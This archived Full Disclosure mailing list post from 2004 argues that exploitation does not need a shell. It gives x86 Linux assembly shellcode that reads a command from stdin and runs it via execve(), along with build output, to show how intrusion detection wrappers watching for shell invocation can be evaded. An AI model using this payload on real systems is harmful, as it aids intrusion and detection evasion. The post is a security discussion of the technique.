Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: No shell => secure?
From: Martin Fallon <mar_fallon () yahoo com br>
Date: Fri, 9 Jul 2004 16:01:46 -0300 (ART)

Hello Srs.!

We don't need a shell. One shellcode use system calls
and the shellcode can be the shell. 

See the follow code:

-------------- noshell.s --------------
#Exemplo de assembly que simula shell.
#Sem utilizar nenhuma shell, ele é a shell.:)
#Nash Leon - nashleon () yahoo com br
#Obs: tah pegando apenas filename com 7 bytes.


xorl %ebx, %ebx
movl $3, %eax
leal -20(%esp),%ecx
movl $20, %edx
int $0x80

pushl %ecx
popl   %esi
movl   %esi,0x8(%esi) 
movb   $0x0,0x7(%esi)
movl   $0x0,0xc(%esi)  
movl   $0xb,%eax
movl   %esi,%ebx 
leal   0x8(%esi),%ecx
#leal   0xc(%esi),%edx 
movl $0x0, %edx
int    $0x80                

movl $0x1, %eax
xorl %ebx, %ebx
int $0x80

This source use read() and execve() to
execute one command from stdin. This sample is
only to demonstrate that is possible create
one shellcode that execute commands without
use one shell(/bin/bash,sh,zsh,tcsh, etc).

It is util when one NIDS/IPS interact with
one shell wrapper, waiting one string in the
interface, capturing an attack.

In this sample is permitted only
7 bytes as path filename to execute:

$ as -o noshell.o noshell.s
$ ld -o noshell noshell.s
ld: warning: cannot find entry symbol _start;
defaulting to 

$ /noshell
noshell  noshell.o  noshell.s

So, Mrs. One shell is not necessary to exploit
one system. NIDs/IPS can use wrapper in the system
call execve() to security, but still is possible
break this resource.

Sorry ny poor english.

Best Regard,

Martin Fallon.
Clube dos Mercenarios

Yahoo! Mail agora com 100MB, anti-spam e antivírus grátis!

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]